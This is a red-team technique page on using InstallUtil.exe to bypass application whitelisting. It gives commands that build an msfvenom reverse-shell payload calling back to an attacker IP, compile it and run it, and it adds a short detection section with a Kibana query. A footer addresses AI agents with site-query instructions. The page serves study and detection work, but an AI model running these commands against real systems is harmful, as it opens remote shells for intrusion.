# InstallUtil

## Execution

First of, let's generate a C# payload (with [InstallUtil script](https://github.com/khr0x40sh/WhiteListEvasion)) that contains shellcode from msfvenom and upload the temp.cs file to victim's machine:

{% code title="attacker\@local" %}

```csharp
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windowsreverse_shell_tcp --lhost 10.0.0.5 --lport 443
```

{% endcode %}

Compile the .cs to an .exe:

{% code title="attacker\@victim" %}

```csharp
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\csc.exe C:\experiments\installUtil\temp.cs
```

{% endcode %}

Execute the payload:

{% code title="attacker\@victim" %}

```csharp
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Microsoft.NET\Framework\v4.0.30319\temp.exe
Microsoft (R) .NET Framework Installation utility Version 4.0.30319.17929
Copyright (C) Microsoft Corporation.  All rights reserved.

Hello From Uninstall...I carry out the real work...
```

{% endcode %}

Enjoy the sweet reverse shell:

![](/files/-LHUlRemzkmdPnsbKP5U)

## Observations

Look for `InstallUtil` processes that have established connections, especially those with cmd or powershell processes running as children - you should treat them as suspicious and investigate the endpoint closer:

![](/files/-LHUlaDwNxHutv7Ow4Vc)

A very primitive query in kibana allowing to find events where InstallUtil spawns cmd:

{% code title="kibana" %}

```
event_data.ParentCommandLine:"*installutil.exe*" && event_data.Image:cmd.exe
```

{% endcode %}

![InstallUtil launching the malicious payload](/files/-LHUsNMxVLuWKHFkmlhs)

![csc.exe created a temp.exe which contains the reverse shell payload](/files/-LHUxQNLHymXzkR8SwSY)

What is interesting is that I could not see an established network connection logged in sysmon logs, although I could see other network connections from the victim machine being logged.

{% hint style="danger" %}
Will be coming back to this one for further inspection - possibly related to sysmon configuration.
{% endhint %}

## References

{% embed url="<https://attack.mitre.org/wiki/Technique/T1118>" %}

{% embed url="<https://github.com/khr0x40sh/WhiteListEvasion>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/code-execution/t1118-installutil.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.